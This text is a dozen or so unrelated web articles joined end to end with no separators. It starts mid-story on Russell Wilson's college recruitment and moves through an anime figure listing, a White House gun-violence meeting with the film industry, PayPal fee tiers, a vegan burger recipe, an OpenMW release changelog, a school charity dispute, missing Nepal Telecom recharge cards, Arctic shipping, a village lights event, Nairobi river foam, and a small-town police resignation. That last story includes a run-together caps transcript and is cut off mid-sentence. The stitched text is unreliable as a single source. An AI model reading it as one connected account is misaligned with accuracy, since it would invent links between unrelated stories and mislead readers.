"After his junior year, which he had a great year that year, what we decided he needed to do was to pick the schools he was interested in and go to their one-day camps in the summer so they could see him up close," McFall said. "We told him not to waste his money and his time going to schools to visit. He definitely wanted to go somewhere close [to Richmond], so his parents could come and see him. His dad was in poor health at the time."
He had already visited in-state programs Virginia and Virginia Tech. Both schools were interested in Wilson, but only as an athlete who could play another position—preferably defensive back.
That's because both schools also had their eyes on other touted in-state passers.
Virginia had targeted 4-star Peter Lalich, who possessed NFL measurables at 6'5" and 235 pounds and was rated the No. 11 pro-style passer in the 2007 class. Lalich ended up signing with the Cavaliers.
In Blacksburg, Hokies head coach Frank Beamer had his sights set on 5-star Tyrod Taylor, who was billed as the nation's top dual-threat passer.
"[Virginia Tech coaches] were honest and said that they wanted to focus on Tyrod and winning the recruiting wars in the Hampton Roads area," McFall said. "They get a lot of players down there, and they told me they would recruit Russell as an athlete only."
With the lukewarm attention from in-state schools, Wilson identified four other ACC programs—Duke, North Carolina, NC State and Wake Forest—as schools he wanted to camp at.
Curt Cignetti, who is currently the head coach at Division II Indiana University of Pennsylvania, was the recruiting coordinator for the Wolfpack at the time.
While Wilson visited North Carolina first, Cignetti actually was tipped off about his exploits in Chapel Hill prior to his arrival on NC State's campus.
"The first guy that actually brought his name to my attention was my brother, Frank. He's with the Rams now, but he was the [offensive] coordinator at North Carolina at the time, and I was at NC State," Cignetti told Bleacher Report. "[UNC] had him in camp in the summer, and [Frank] loved [Russell]. But they had already taken an early commitment from another kid. He couldn't convince [UNC head coach] John Bunting to take another quarterback. [Frank] told me about him."
Credit: Collegiate School, Richmond, Va.
McFall remembers hearing about Wilson's performance that day from then-Tar Heels running backs coach Andre Powell, whom he had known for a long time.
As McFall recalls, Powell told him how he and a couple of fellow Tar Heels offensive assistants went into Bunting's office to plead their case as to why Wilson deserved an offer.
But Bunting relented because he already secured a commitment from 4-star quarterback Mike Paulus, a 6'5", 220-pound New York native rated as the nation's No. 7 pro-style passer in 2007. Bunting was leery of adding a second quarterback who could potentially give Paulus second thoughts.
"Russell really gave them a show, but they were a little afraid to offer Russell if Russell didn't sign with them and they lost the other guy," McFall explained.
Credit: Collegiate School, Richmond, Va.
With the Tar Heels out of the equation, the next stop was at Duke, where Wilson also impressed the coaching staff for the Blue Devils. Unlike the situation in Chapel Hill, there was no hesitation on the part of then-Duke head coach Ted Roof and his staff.
"They offered him on the spot," McFall said.
NC State was the third stop on Wilson's tour of the triangle area in the Tar Heel State.
Armed with the knowledge his brother had given him, Cignetti watched as Wilson dazzled during drills. He saw similar traits that led him to recruit another overlooked passer to Raleigh just a few years earlier.
"[Russell] could really spin the ball. He had what Philip Rivers had," Cignetti said. "He was just a quick decision-maker and a winner. He could beat you with his arm or his legs. Marc Trestman was coaching our quarterbacks then, and Marc loved him. There was no hesitation because of that."
Wilson earned an offer from Wolfpack head coach Chuck Amato and finished his tour at Wake Forest. While he also performed well at the Demon Deacons camp, their staff lost contact with Wilson's camp shortly afterward.
John Raoux/Associated Press
With both NC State and Duke pulling the trigger on offering him, his list quickly condensed to the two Tobacco Road stalwarts.
He returned to Raleigh with his parents shortly afterward. That visit helped seal the deal for both Wilson and the Wolfpack, as he committed shortly before his senior season.
"We knew he was special. He came from a great family," Cignetti said. "His grandfather had been the president, I think, at Norfolk State. His dad was very successful, and so was his mom. He was just extremely alert, intelligent and aware of everything on the field. He was just a natural. He was a great baseball player too."
While other schools were unsure of Wilson's abilities, Cignetti never wavered and took advantage of being one of the few schools to show faith in his potential.
"He was looking for a good place to go, because I'm sure he had been told 'no' by some other people," Cignetti explained. "He was looking for an opportunity."
Cignetti notes that there was still work to be done after Amato got fired after the 2006 season and the school hired Boston College head coach Tom O'Brien to replace him.
"Tom O'Brien came in, and I was retained. Other people started to recruit [Russell], and I kept him committed for us," Cignetti said. "Tom was a little leery because of his height, so I kind of had to sell Tom on how special he was."
Seth Perlman/Associated Press
Ironically, in part because of O'Brien's stance on not wanting Wilson to play baseball in the spring, Wilson ended up going through the recruiting process a second time as a graduate transfer in the summer of 2011.
McFall recounts getting a phone call from then-Wisconsin offensive coordinator Paul Chryst, who is currently the head coach for the Badgers.
The Badgers were interested in Wilson, but as McFall notes, Chryst made the trek to Richmond to do his due diligence because he "couldn't afford to make a mistake on a one-year guy."
McFall gave Chryst a laundry list of reasons why Wilson could be successful at Wisconsin, highlighted by his maturity, leadership and competitiveness.
Wilson ended up choosing Wisconsin over Auburn, and after three weeks on campus in Madison, McFall remembers getting a text from a giddy Chryst.
"Better than advertised, coach."
Julio Cortez/Associated Press
Of course, Wilson used a banner senior season with the Badgers as a launching pad for his pro career—where he's continued to defy the odds by becoming one of the elite passers in the NFL and leading the Seahawks to a Super Bowl title in 2013.
However, his journey may have never taken off if not for the belief of his high school head coach, who insisted Wilson could play quarterback at the highest level.
"I think it's a great story as far as recruiting, because it is not an exact science," McFall said. "Russell was one a lot of schools missed the boat on. He's such a competitor, and he's got such a good head on his shoulders. He made a lot of them wish they would have given him a better look."
Editor's note: Throughout the 2015 football season, Bleacher Report will continue a series on the college recruitment of today's biggest sports stars. For previous installments, see below:
Sanjay Kirpalani is a National Recruiting Analyst for Bleacher Report. Unless otherwise noted, all quotes obtained firsthand, and all recruiting information courtesy of 247Sports.
Follow @SanjayKirpalani
AMAKUNI (Hobby Japan) is going to release the Utsutsu ( うつつ ) 1/7 PVC figure from the anime “Gatchaman Crowds” ( ガッチャマン クラウズ ). Will be released in January-February 2015. Around 210mm tall, 10,800 yen for the standard edition, 11,880 yen for the limited edition. Hobby Japan exclusive.
Eba Yuzuki, Utsutsu, Takanashi Rikka (left to right)
Three new PVC figures from Hobby Japan! They are Eba Yuzuki, Utsutsu, and Takanashi Rikka. But as we all know, all three of them are Hobby Japan exclusive.
For those of you who want to ge this Utsutsu figure, you can order her at Hobby Japan Online Shop for the standard edition HERE or the limited edition HERE before August 11, 2014 with your proxy service.
**Bonus A3 size Utsu Utsu clear poster for the Limited Edition**
Former Sen. Chris Dodd chairs the Motion Picture Association of America. Hollywood's take on W.H. gun summit
Film, TV and cable sector lobbyists met with Vice President Joe Biden on Thursday night to discuss efforts to curb gun violence, but it was unclear what more Washington could do to force the entertainment industry to temper the blood and guts.
The 2 ½-hour meeting included presentations from companies and trade associations about how they already self-regulate or provide parents the tools to protect children from violent or racy content — such as voluntary ratings systems for movies and TV shows.
Story Continued Below
( PHOTOS: 10 violent video games)
“The entertainment community appreciates being included in the dialogue around the Administration's efforts to confront the complex challenge of gun violence in America,” the attendees said in a joint statement late Thursday. “This industry has a longstanding commitment to provide parents the tools necessary to make the right viewing decisions for their families. We welcome the opportunity to share that history and look forward to doing our part to seek meaningful solutions.”
Signing on to the statement were representatives of the Directors Guild of America, Independent Film & Television Alliance, Motion Picture Association of America, National Association of Broadcasters, National Association of Theatre Owners, and National Cable & Telecommunications Association.
The meeting had a much different feeling than the one earlier in the day with the NRA, a source said on background. Biden, who is heading the White House Task Force on Gun Violence, and former Sen. Chris Dodd (D-Conn.), who chairs the Motion Picture Association of America, go way back and were friendly, the source said, adding that Biden assured the industry that there was no effort afoot to trample on First Amendment rights.
( PHOTOS: Politicians speak out on gun control)
"As an industry we've tried to help, and we'll continue to, and the [participants] tonight talked about taking a look at what new technology is available to prevent kids from consuming adult media," said the source, who was not at the meeting but briefed. "There's a sense, though, that the Internet industry will need to help, too, since that's how so many kids see these things."
Biden has a meeting scheduled for Friday at 2:15 p.m. with representatives from the video-gaming community, including Entertainment Software Association CEO Mike Gallagher, an executive from the retailer GameStop and researchers who study the effects on young kids of video game violence, according to sources.
The entertainment industry — and first-person shooter games in particular — have come under scrutiny by the likes of the National Rifle Association for sharing the blame for the rash of mass shootings that have gripped the nation, such as the massacre of 20 children and six adults at Sandy Hook Elementary School, in Newtown, Conn.
( PHOTOS: Stars call for gun control)
The federal government's best chance to clamp down on depictions of violence in the entertainment industry comes from the bully pulpit as any attempt to regulate mayhem on both the big and small screen faces a high bar.
“What Vice President Biden can do is talk to the industry and see if he can get some voluntary restrictions; there's nothing wrong with industry self-regulation,” said Robert Richards, a Penn State professor and director of the Pennsylvania Center for the First Amendment. “But turning this into any type of legislation by Congress, you're going down the wrong path.”
It's unclear what the Obama Administration wants to do, but on Thursday Biden said it would take an effort from everyone to curb violence.
“We realize this requires all the stakeholders to give us their best ideas to what is, as I said at the outset, a complicated problem,” he said, according to a pool report earlier in the day. “There is no single answer.”.
PayPal Holdings Inc. will eliminate volume-based price tiers and charge all of its small U.S. merchants 2.9% of the sale plus 30 cents per domestic transaction come Oct. 1, according to a notice the leading online-payments firm began sending to merchants Thursday.
The 2.9%-plus-30-cents tier is the highest rate under the current price schedule that has been in effect for years. That standard rate is for merchants generating only up to $3,000 in monthly PayPal volume.
The tiers to be eliminated are 2.5% plus 30 cents, for merchants generating $3,000 to $10,000 in monthly PayPal volume, and 2.2% plus 30 cents, for those with PayPal monthly charges between $10,000 and $100,000. The micropayments rate—5% plus 5 cents for merchants with transactions averaging under $10—will not be changing.
A spokesperson for San Jose, Calif.-based PayPal says the change will affect fewer than than 1% of the 10 million merchants worldwide that accept PayPal. Most merchants are big enough to have individual pricing agreements with PayPal.
“We're making these changes to be in line with the services we have,” says the spokesperson, referring to PayPal's assortment of services for merchants that include the One Touch service for fast online checkout, fraud protection, the PayPal Working Capital loan program, and access to 169 million consumers who use PayPal.
The pricing changes don't affect many merchants but still will help PayPal, recently spun off from long-time parent company eBay Inc., counter the downward pressure on pricing exerted by bigger merchants, according to Gil Luria, an analyst and managing director at Los Angeles-based Wedbush Securities. PayPal's so-called take rate, a measure of profitability, declined in 2015's first six months to 3.43% of the transaction from 3.54% in the same period a year earlier, according to an eBay regulatory filing.
“Based on the magnitude of sellers impacted, the price increase looks like more of a price simplification,” Luria tells Digital Transactions News by email. “PayPal has had declining take rates for the last few years, which it needs to offset. As larger merchants become a greater part of its volumes, PayPal needs to offset the negative mix shift by charging more from smaller merchants that don't have the same negotiating power.”
Pay with Amazon, a rival online-payments service from Seattle-based Amazon.com Inc., also charges 2.9% plus 30 cents for domestic transactions, with lower pricing available to higher-volume merchants.
PayPal had revenues of $4.43 billion in 2015's first half, up 15% from $3.86 billion a year earlier. Total payment volume increased 18% to $130.5 billion from the prior-year period's $110.4 billion.
Due to recent feedback, I am working more with the different consistencies for my burgers. When I first started cooking I would always use a flax egg to bind my mixture together, but found that the resulting burgers tuned out a little heavy for my personal liking, then I went to using mashed potato instead to bind the burgers along with a little flour, which has resulted in soft “mushier” burgers and now I'm going to try and work more on getting something in between the 2. Enter polenta….
Don't get me wrong, I really enjoy the softer burgers with just the potato to bind them, consistency aside, I always love the taste of the burgers, but I know that for many people, they are looking for something that isn't too fragile and you can maybe flip on a BBQ, so I want to have a good balance of taste and form.
So I was thinking about how I love polenta and how it binds together when cooked and a lightbulb went off in my head that this could be just what I was looking for. So these curried veggie burgers turned out incredibly well, you do have to be more vigilant when cooking as you don't want to dry them out by cooking them too long. But as a nicely shaped and non mushy burger I personally think it's a hit.
Curried Polenta Veggie Burgers with Rocket and Cherry Tomato Salad (Vegan & Gluten Free)
MyInspiration Feel The Difference Range
Makes 6 burgers – Ready in 30 minutes
2 medium/large white potatoes, peeled, chopped, boiled for 12 minutes, drained and mashed (about 3 cups worth)
1/4 cup polenta
1 tsp cumin
1/2 tsp Garam masala
1.5 tbsp Hot Curry powder (or mild whatever you like best)
Black pepper to season
1/2 tbsp lemon juice
2 cloves garlic finely sliced
1 small green pepper (capsicum) very finely diced.
2 tbsp tomato puree
1/2 red onion very finely sliced
1 hot green chili very finely sliced
Handful of fresh coriander leaves chopped
Method
Prepare the mashed potatoes
Preheat oven to 180 degrees celcius (356 degrees Fahrenheit) and line a baking tray with parchment
In a large mixing bowl combine the garlic, green pepper, red onion, green chili, coriander, tomato puree, black pepper, lemon juice and all the spices and mix well together, now fold through the mashed potato and the polenta until everything is well combined. Using your hands, shape the mixture into 6 patties (tip – moisten your hands to make it easier to handle the burger mixture), place on the baking tray and bake for 15 – 20 minutes until they look lovely and golden and have firmed up.
I served my burgers with a side salad of rocket leaves, chopped cherry tomatoes along with a slice of wholegrain bread smothered in hummus. I topped my burger and salad with a little Encona mango chili sauce.
OpenMW 0.27.0 Released! 2013-11-29 - raevol
The OpenMW team is proud to announce the release of version 0.27.0! Grab it from our Downloads Page for all operating systems. This release brings the first official release of OpenCS, the OpenMW team's efforts to bring an open source solution for editing content for OpenMW. OpenCS is in an early Alpha state, please take that into consideration when testing! See the full notes below.
Check out the release video by the indomitable WeirdSexy:
Known Issues:
PLEASE NOTE! There have been changes to the OpenMW config files. The game will not run with old configurations, but your configuration can be updated by simply running the Launcher. If you normally run OpenMW directly from the executable, please re-run the Launcher once to update.
Extreme shaking may occur during cell transitions for some users (enable anti-aliasing as a possible workaround)
Changelog:
Implemented Acrobatics
Implemented God Mode
Implemented torch extinguishing
Implemented breath meter color change when it is running low
Fixed polish language version of Morrowind crashing OpenMW
Fixed decimal numbers not displaying correctly in the UI
Fixed camera not lowering while sneaking
Fixed ambient sounds playing while the game is paused
Fixed being able to enter third person view with the mousewheel when it should be disabled
Fixed some CDs not working correctly with Unshield installer
Fixed a script instruction to allow the Quick Character Creation plugin to work
Fixed fatigue not regenerating when jumping
Fixed Laire dieing inexplicably in Beshara
Merged the –master and –plugin switches
OpenCS: Implemented a start dialogue
OpenCS: Implemented handling file paths so that files are saved only to the local data cirectory, and only with OpenMW extensions: omwgame/omwaddon
OpenCS: Implemented Saving
OpenCS: Implemented new ESX selector
OpenCS: Implemented enforcing single-instance mode since multiple projects can be open
OpenCS: Implemented record filtering
OpenCS: Implemented default record filters
OpenCS: Proper compiler configuration (currently used only for syntax highlighting)
Like this: Like Loading...
East Point Academy is a charter elementary school in West Columbia, South Carolina where, for the third year in a row, teachers and administrators were encouraging students to participate in Operation Christmas Child — a program where students could donate toys to impoverished kids overseas.
Sounds nice, right?
Just one catch: Operation Christmas Child is run by the group Samaritan's Purse and the boxes of toys they give to those impoverished children each come with a pamphlet designed to convert them to Christianity, pledge card and all:
On Monday, the American Humanist Association's Appignani Humanist Legal Center sent the school's administrators a letter telling them to stop their faith-based outreach:
The boxes of toys are essentially a bribe, expressly used to pressure desperately poor children living in developing countries to convert to Christianity, and are delivered with prayers, sermons, evangelical tracts and pressure to convert. While a private religious group is free to pursue such a goal, even through such questionable means, a public school cannot affiliate itself with, endorse, promote or support such a group's program without violating the Establishment Clause. … In addition to having a religious purpose, the plain effect of Operation Christmas Child is to endorse and promote religion. The school is in effect urging students to make an in-kind contribution, as well as for their parents to make a monetary one, to Samaritan Purse's conversion efforts. Moreover, the school is plainly sending the message to young school children that the Christianity at the core of Operation Christmas Child is “stamped with [the] school's seal of approval.”
The letter had the intended effect — yesterday, Principal Renee Mathews responded (indirectly) to the AHA, making them aware of a letter she sent out to all the parents (emphasis hers):
Therefore, in an abundance of caution because we do not want to expend school financial resources defending a lawsuit, we are not going to accept Operation Christmas Child boxes. If you and your child had planned to donate a shoebox of supplies, you are encouraged to find a charity of your choice for the gift. A reminder that Toys for Tots will continue until December 10 so you are encouraged to participate. Thank you for your support.
Even if the boxes from the students were non-religious in nature, by going through an explicitly Christian charity, there was an implicit endorsement of its religious beliefs. If a lawsuit were filed, the school would've been on the losing end of it.
What makes me especially upset — even though I'm glad the partnership has ended — is how Mathews casts the AHA as the bad guys here. Note how she says the school is ending the program “in an abundance of caution” because they couldn't pay to fight a lawsuit. It's like she really wanted to say, “We would totally continue this program if it wasn't for that evil group that takes the ‘law' seriously. Blame them, not us!”
Elsewhere in her letter is an admission that “many public schools in SC and across the United States participate in Operation Christmas Child.” As if everyone doing something illegal makes it okay for them to do something illegal. It's very possible that other schools participate in OCC. But it takes a brave parent or students to come forward about it before a group like the AHA (or the Freedom From Religion Foundation) can act.
That's what happened at East Point Academy. A parent notified the AHA of the constitutional violation. The identity was protected, the AHA sent its letter, and the school stopped the endorsement of Christianity. It's just that easy.
If other parents at other school districts did the same thing, the program would stop at their schools, too, diverting the generosity and goodwill of the families to secular charities that care more about helping people than converting them.
Jan 29, 2017-
Top-up cards of Nepal Telecom (NT) worth Rs2 million—20,000 units worth Rs100 each—have gone missing while being imported from India, the state-run telecom service provider said on Saturday.
Spokesperson Prativa Baidhya said NT became aware of the incident only after the consignment reached the Birgunj customs point.
Following the incident, NT's wireless service directorate has issued a public notice urging consumers not to sell or purchase 100-rupee recharge cards bearing serial numbers 111 61000 816 00001 to 1116 10008 162 0000.
“We have already deactivated these 20,000 recharge cards,” Baidhya said, adding the notice was issued to make buyers as well as sellers aware.
NT has already reported the incident to the Indian manufacturer and the shipping company.
NT will first enquire about the incident with them, and if it finds their response unsatisfactory, it said it will lodge a police complaint.
The consignment—Rs20 million in total—also had recharge cards of higher denominations, but only the box containing 100-rupee cards was found missing.
NT said it is the first such case. “There were incidents of a few cards missing in the past. But it is first such big case,” Baidhya said.
The latest MIS (Management Information System) report of Nepal Telecommunications Authority (NTA) has positioned Nepal Telecom as the biggest telecom service provider, with 48 percent market share in terms of the number of SIM-card holders.
The state-run telecom service provider has 13,536,114 subscribers of GSM mobile phone service, and 1,456,790 CDMA service users.
Published: 29-01-2017 09:38
China Can Play Key Role in Arctic Shipping
By MarEx 2015-03-21 17:24:48
By Heidar Gudjonsson and Egill Thor Nielsson
At their best, Arctic shipping routes connect the world's largest economies in the Atlantic and Pacific via more profitable, shorter, faster and thus more environmentally friendly trade routes than conventional shipping lanes. Arctic shipping can cut distance between Shanghai and Europe by up to 40 percent, and in this decade vessels transiting through the Northern Sea Route (NSR), by the shores of Russia, have gone from four in 2010, peaking at 71 in 2013 and down to 31 in 2014.
Heavy ice conditions, skeptical insurance companies and a sluggish global economy are the most common explanations given for last year's slump. What is apparent is that shipping companies and other stakeholders will have to show more commitment for any significant developments to take place in Arctic shipping, and Asia can play a key role.
China tries the icy waters
There is no established transcontinental container network through the Arctic Ocean. In 2013, China's largest shipping company, COSCO, became the first to pilot a container-transporting vessel through NSR when its multipurpose vessel M/V Yong Sheng carried 16,740 tons of general cargo (steel and heavy equipment) from Dalian to Rotterdam. China has shown an increasing interest in Arctic shipping as it could prove transformative for the world's most important trade routes between Asia and North America and Asia and Northern Europe, which account for around 60 percent of transcontinental TEU cargo volumes in 2013.
Iceland and China have developed firm bilateral cooperation on Arctic issues under the Framework Agreement on Arctic Cooperation signed by the two governments in April 2012 during an official visit by the former Premier of China, Wen Jiabao, to Iceland. A memorandum of understanding in the field of marine and polar science and technology signed on the same occasion led to China's sole icebreaker, R/V Xuelong (aka Snow Dragon), visiting Iceland in August 2012 at the invitation of the President and Government of Iceland.
This was Xuelong's first official visit to an Arctic state and the first time a Chinese-flagged vessel crossed the Arctic Ocean, first via the NSR and returning via the Central Arctic Route (CAR). Xuelong's fifth Chinese National Arctic Research Expedition showcased the CAR's future viability as the shortest shipping route between East Asia and North Europe.
HE Ólafur Ragnar Grímsson, President of Iceland, welcomes R/V Xuelong to Reykjavik (photo: CHINARE5)
In September 2012, Captain Wei Jiafu, then Chairman of COSCO, visited Iceland with a delegation to analyze the potential of Arctic shipping, and in October 2013 Li Yunpeng, President of COSCO, presented the company's Arctic vision at the inaugural Arctic Circle Assembly in Reykjavik. In January 2014, COSCO and Eimskip (an Icelandic transportation company) reached an agreement on future cooperation relating to potential Arctic sailings; however a cooperation agreement signed in parallel on transportation in the North Atlantic and international reefer forwarding carries more weight for now.
In July 2014, Iceland became the first European country to ratify a Free Trade Agreement with China and in 2013 People's Bank of China and Central Bank of Iceland renewed a bilateral currency swap agreement, worth $570 million with a three-year maturity, which further promotes bilateral trade and direct investment.
Iceland as a Northern entry
Iceland's central Atlantic location in the northern hemisphere makes it an ideal northern entry to Europe from East Asia. In a similar fashion as the Port of Piraeus in Greece has become, and thrived as, it could be COSCO's southern gateway to Europe. Since COSCO's first involvement at the end of 2008, the port has become Mediterranean's third largest in terms of container traffic, handling a total of almost 3.7 million containers in 2014 up from 450,000 TEU in 2009. The total worth of COSCO's investments will soon reach €500 million ($530 million) and the port should, in a few years' time, handle up to 6.2 million TEU per year, which would make it one of Europe's five largest ports.
It is highly unlikely that there would be one single Atlantic Arctic transshipment port servicing everything. A case in point can be found in how ports have developed in both Asia and Europe, where there is not a sole service hub in each continent. In 2013, nine of the world's 10 busiest ports were in Asia, with multiple hubs growing rapidly and sometimes in close proximity to each other, while Europe's leading ports in Hamburg, Rotterdam and Antwerp (almost in each other's backyard) furthermore underpin the probability of there being several Arctic ports in future.
Iceland could be developed over time as a transshipment hub in the Atlantic Arctic, expanding infrastructure according to needs as the international shipping network expands through the NSR, then the North West Passage (NWP) and finally the CAR. Iceland is not the prime Atlantic destination for the NSR, where Murmansk, Kirkenes or perhaps Rotterdam could make more feasible transshipment hubs, or for the NWP, where St. John's, Maine or Nuuk are likelier candidates. However, Iceland's ice-free ports would be the best destination for the CAR and could link NSR cargoes bound for Europe and North America as well as NWP cargoes bound for Europe.
Arctic Shipping Routes (photo: Arctic Portal)
Disrupting the status quo
Transportation is the foundation of international business, and it would be of great benefit if shipping, the most economical form of transport, would once more find a way to reduce the costs of moving goods between continents. This has been the case in the past, for example, following technological advances from the industrial revolution starting in the 18th century, with the building of the Suez Canal in the 19th century and the invention of the container in the 1950s.
However, the international shipping network is very rigid. As with many other networks, it is difficult to disrupt, and the question is rather how to link efficiently into it rather than to try to build a competing one. Traffic in the Arctic will grow on its own, but it will also provide new links to the existing transcontinental network.
Transcontinental shipping through the Arctic Ocean has started on a very small scale, but judging by current indicators it may still be a few decades before it will be commercially viable. Many uncertainties of a legal, environmental, economic, social, political and technological nature remain regarding the future feasibility of Arctic shipping. Further infrastructure development in the area is needed, not only for intercontinental transits but also to meet the needs of increased coastal traffic. However, the current situation is not set in stone, and with coherent international initiatives Arctic shipping can become a lucrative business quickly.
Asian shipping companies are likeliest to be the catalysts for change. It makes sense for them to expand their networks to new hubs in North America and Europe, the Port of Piraeus being a case in point. But the question remains, who is willing to allocate the necessary time and resources needed in order to reap the benefits of connecting the Arctic shipping routes to the international shipping network? - MarEx
Heidar Gudjonsson is Chairman of Eykon Energy and Vodafone Iceland. Egill Thor Nielsson is Executive Secretary of the China-Nordic Arctic Research Center and Visiting Scholar at the Polar Research Institute of China.
Note: The original title of the article by the authors is: "Can Arctic shipping break into the international shipping network: The case of China-Iceland cooperation".
The opinions expressed herein are the author's and not necessarily those of The Maritime Executive.
Get the biggest daily stories by email Subscribe Thank you for subscribing See our privacy notice Could not subscribe, try again later Invalid Email
Crowds gathered in Cranleigh village centre on Saturday for an afternoon of family fun before the switch-on of the town's Christmas lights.
The event was themed on poplar Disney film Frozen and featured appearances from the film's characters Princess Anna, Princess Elsa and Olaf the snowman.
A Christmas crafts workshop was held at Cranleigh Arts Centre, as well as a sing-along screening of Frozen.
Children enjoyed a special rhyme time session at Cranleigh Library and a nativity farm in Fountain Square, plus fairground rides and face painting.
For grown-ups, there was a craft fair at the village hall, a barbecue at the Richard Onslow pub and a French market in Stocklund Square.
Families gathered to watch performances by VMA Dance, Stagecoach and Cranleigh Dance and Theatre Art, as well as the Duke of Kent Choir and Cranleigh Community Choir.
Following the lights switch-on ceremony, local band Catfish kept people entertained into the evening.
Just over a week ago, M. Sanjayan, the lead scientist for the Nature Conservancy, posted photos of a “suds tsunami” rising from a polluted river in Nairobi and spilling over a highway. He's added this video snippet, in which you can here him say, “No river should be doing that. Mountains of foam, in Nairobi.”
He added this text note:
Not far from the Kenya Wildlife Service headquarters, the road I was on was blocked by a wall of suds, white and fluffy as if spewing out of an errant giant steam carpet cleaner. It was well over two stories high in places.
He's written more on the incident and related issues on the HuffPost Green blog.
Interestingly, there he linked to a Web Ecoist post, “Water Colors: 10 Unnaturally Dyed Polluted Rivers,” which brought me full circle back to a special report I wrote in 1996 about the polluted history and remarkable (if still incomplete) cleanup of the Hudson River.
Here's a passage from my article — focused on the Hudson around Beacon, N.Y. — that I think offers a helpful reminder that Nairobi's (and Shanghai's and Lagos's and Delhi's) pollution problems now were echoed here just two generations ago:
[Shabazz] Jackson, Beacon's environmental director, recalled how in the 1950's he and other students riding a crosstown school bus would often pool lunch money before reaching the Fishkill Creek — a Hudson tributary — and make bets on the color of the water. A fabric-dyeing plant upstream kept them guessing. Pollution shaped other childhood rites, as well, including summertime swims. To avoid dunking heads in tainted water, Mr. Jackson said, “kids in Beacon never learned to dive.” Other Hudson Valley residents recalled the dense pillows of white foam that would slowly drift by on the river — effluent from factories. Children would compete to see who could get a tossed stone to perch on the fluff.
Let's hope that countries going through their industrial, and polluting, growth spurt now can undergo the same transition, so that there, too, foaming rivers will be a fading memory instead of a jarring sight.
Hide Transcript Show Transcript
WEBVTT D.IT'S AN INTERVIEW YOU'LL SEEONLY ON 40/29.REPORTER: LINDSEY GREEN WORKEDHERE IN VIAN SINCE DECEMBER.SHE WAS JUST HONORED AS OFFICEROF THE MONTH.@BUT SHE SAYS THINGS CHANGED WHENSHE ARRESTED A CITY COUNCILMAN'SSON FOR DRIVING WITHOUT ALICENSTHAT'S OFFICER GREEN WHEN WETALKED TO HER IN JANUARY BUT SHERESIGNED ON MONDAY.>> MY THING IS I DON'T WORK FORA TOWN THAT CONTROLS THE POLICEDEPARTMENT, I WANT TO BE THEPOLICE, I DON'T WANT SOMEONETELLING ME WHO I CAN AND CAN'TARREST. REPORTER: LAST WEEK WHILE ONPATROL, GREEN SAYS AN OFF DUTYOFFICER CALLED, SAYING THAT HISNEIGHBOR WAS DRIVING WHOUT ALICENSE AND WAS PREVIOUSLYTICKETED IN NOVEMBER.>> WHEN HE STOPPED AT THE STOPSIGN HE DIDN'T SIGNAL WITHIN SOMANY FEET OF A TURN HE CROSSEDTHE CENTER LINE, STOPPED HIMASKED FOR HIS DRIVERS LICENSE,HE SAID HE DIDN'T HAVE IT WITHHIM.REPORTER: ACCORDING TO THEPOLICE REPORT, THIS MAN, JOSHUASMITH, WAS ARRESTED FOR DRIVINGWITH A SUSPENDED LICENSE.>> AT THAT TIME HE INFORMED METHAT HIS DAD WAS A COUNCILMEMBER.THE LAW'S FOR EVERYBODY ITDOESN'T MATTER WHO YOUR DAD IS.REPORTER: GREEN SAYS IT WASN'TTHE COUNCILMAN WHO CALLED, BUTCI ATTORNEY LARRY VICKERS.>> SAYING YOU HAD NO REASON TOARREST HIM, YOU NEED TO DROPYOUR TICKET AND HE NEEDS TO BERELEASED FROM JAIL IMMEDIATELY.THE MAYOR TOLD ME YOU'RE LUCKYWE DON'T HAVE A LAWSUIT ON OURHANDS BECAUSE YOU HAD NO REASONTO ARREST HIM.REPORTER: THE MAYOR WOULD NOTTALK ON CAMERA, BUT REFERRED USTO THE CITY ATTORNEY.LARRY VICKERS SAID BY PHONE THATGREEN STOPPED THE DRIVER ONLYBECAUSE ANOTHER OFFICER TOLD HERTO.THE CITY ATTORNEY DROPPED ALLCHARGES.>> I DIDN'T THINK VI WAS LIKETHAT.REPORTER: GREEN SAYS OTHER CITYLEADERS TOLD HER THE CITYCOUNCIL WAS GOING TO VOTE TOFIRE HER, SO SHE RESIGNED.THE MAYOR SAYS FIRING THE ONLYFEMALE OFFICER WAS NEVER ON THEAGENDA.GREEN SAYS SHE WOULD NOT HAVEDONE ANYTHING DIFFERENTLY.REPORTER: I'M AT PEACE BECAUSE IKNOW I'm DONE MY JOB, I TOOK ANOATH TO DO MY JOB.REPORTER: THE POLICE CHIEF TOLDME GREEN DID NOTHING WRONG ANDHE SUPPORTS HER 100%.THE CHIEF SAID THAT'S WHY HESIGNED OFF ON THE POLI REPORT.
Advertisement Vian former police chief, officer could be under investigation Share Copy Link Copy
UPDATE #2 - May 10, 2017: Former Vian Police Chief Ted Johnson and former officer Lindsey Green could be under investigation, Mayor Dennis Fletcher told 40/29 News. Mayor Fletcher said he and the city attorney could ask an independent agency to investigate possible police misconduct when Officer Green pulled over and arrested Joshua Thomas Smith for driving with a suspended license. UPDATE #1 - May 10, 2017: The Vian Police Chief, Ted Johnson, has announced his resignation. This, just one day after one of his officers, Lindsey Green, resigned for fear of being fired after arrested a city councilman's son for driving without a license. Johnson told 40/29 News he fully supports his officers and for the betterment of the town he is resigning. Johnson's last day as police chief of Vian will be Monday. ---------------------------------------------- Original article from May 9, 2017: Lindsey Green started working for the Vian Police Department in December, 2016. She was the first full-time paid female officer to patrol the town. But on Monday, Officer Green resigned from the police department. In an exclusive interview, she told 40/29 News she was afraid of being fired after she arrested a councilman's son. "I don't work for a town that controls the police department. I want to be the police, " Green said. "I don't want someone telling me who I can and can't arrest." While on patrol last week, Green said an off duty police officer called her and reported that his neighbor was driving on a suspended license. The off duty officer told Green the driver was previously cited in November for the same thing, according to Green. "When he (the driver) stopped at the stop sign he didn't signal within so many feet of a turn," Green said. "He crossed the center line and I stopped him. I asked for his drivers license and he said he didn't have it with him." According to the police report, Joshua Thomas Smith was arrested for driving while his license was suspended. "At that time he informed me that his dad was a council member," Green said. "I replied, the law's for everybody and it doesn't matter who your dad is." The councilman never called, instead, City Attorney Larry Vickers called, according to Green. "He was saying I had no reason to arrest him, and that you need to drop your ticket and he needs to be released from jail immediately, " Green said. "The mayor told me you're lucky we don't have a lawsuit on our hands because you had no reason to arrest him." The mayor would not talk on camera and referred 40/29 News to the city attorney. Vickers told 40/29 News by phone that Green stopped the driver solely because she was told to by another officer. Vickers said he dropped all charges against Smith. "I didn't think Vian was like that," Green said. "The city attorney has no business telling you who you can and can't arrest." Green resigned after other city leaders told her the city council was going to vote to fire her, according to Green. The mayor told 40/29 News that firing the department's only female officer was never discussed and it was never placed on the agenda for the council meeting. Green told 40/29 News, looking back, she would not have handled the arrest any differently. "I'm at peace because I know I did my job," Green said. "I took an oath to do my job." Vian Police Chief Ted Johnson told 40/29 News that Officer Green did 